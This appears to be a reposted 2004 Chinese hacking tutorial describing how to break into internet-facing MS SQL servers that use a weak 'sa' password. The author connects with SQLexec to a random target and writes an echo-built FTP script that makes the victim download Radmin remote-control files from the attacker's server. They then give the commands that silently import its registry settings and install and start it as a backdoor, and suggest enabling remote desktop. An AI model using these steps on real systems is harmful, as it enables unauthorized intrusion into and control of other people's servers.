首页 电脑 电脑学堂 查看内容

SA弱口令结合FTP的入侵实例

2004-11-23 06:41 1182 0

摘要: 作者:栓子  来自:http://admins.ltxz.net/ 闲着无聊,就在网上随便找了一段,最近一直想利用SQl做点什么,所以就先从他弱口令开始吧。呵呵!~~  &nbs...
关键词: nbsp echo FTP txt 呵呵 如果 命令 SQlexec server 机子

作者:栓子  来自:http://admins.ltxz.net/ 闲着无聊,就在网上随便找了一段,最近一直想利用SQl做点什么,所以就先从他弱口令开始吧。呵呵!~~    这样的机子在网上要多少有多少,扫描工具更是举不胜举,我在此不做过多的详述,今天我们是要利用这些漏洞上传木马,获取系统权限才是目的。    好了,拿出久味开启的SQlexec数据库连接工具,复制了一个IP上去,先试试能不能连。呵呵!      不错,我们成功的看到了他C盘下的动动。今天的运气真的是太好了,高兴的。。。。原地走两圈吧!我接着键入net start命令,服务一切正常,所以想走捷径是不可能了。不打紧,我们给他下个木装上不就得了。呵呵,说做就做,先写一个FTP的脚本吧,这样方便这鸡一下子把所有的东东下完。 我做的FTP.txt脚本如下:     @echo off     @echo open ftp.targe.com port>ftp.txt     @echo username>>ftp.txt     @echo password>>ftp.txt     @echo get radmin.reg>>ftp.txt     @echo binary>>ftp.txt     @echo get admdll.dll>>ftp.txt     @echo get r_server.exe>>ftp.txt     @echo bye>>ftp.txt     @echo on     ftp.targe.com是你的ftp的地址,username和password是。。。。不用说了吧!port是端口号。当然,如果你需要看执行结果的话,可以把@echo off和@echo on这两行取掉,也方便录入。呵呵~~     接着在命令行里面键入: ftp -s:ftp.txt一切顺利的话,过不了多长时间,都会把这三个文件下下来。      呵呵,伟大的时间就要到来了!      当文件下载一切成功之后,我们就可以启动它了。 命令如下:     regedit /s radmin.reg     r_server /install等等,在SQlexec里面执行到这的时候往往Sqlexec回死掉,如果死掉的话,那么我们再接着连接,接着键入     net start     你会在屏募上看到熟悉的字符,哈哈哈。"successful!"     我想到了, 这里就不用我说了吧,如果你进的是一台Server的机子,那开3389就看个人爱好了。不过如果入侵了一台WEB的服务器,最好不要乱来哦。不然网管会哭的,我这里只是介绍方法,一切后果可是与我没有半点关系的。      就到这里吧,写的太乱了,如果大家有什么问题可以向我提问!
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系 [邮箱地址] 删除

路过

雷人

握手

鲜花

鸡蛋

最新评论

返回顶部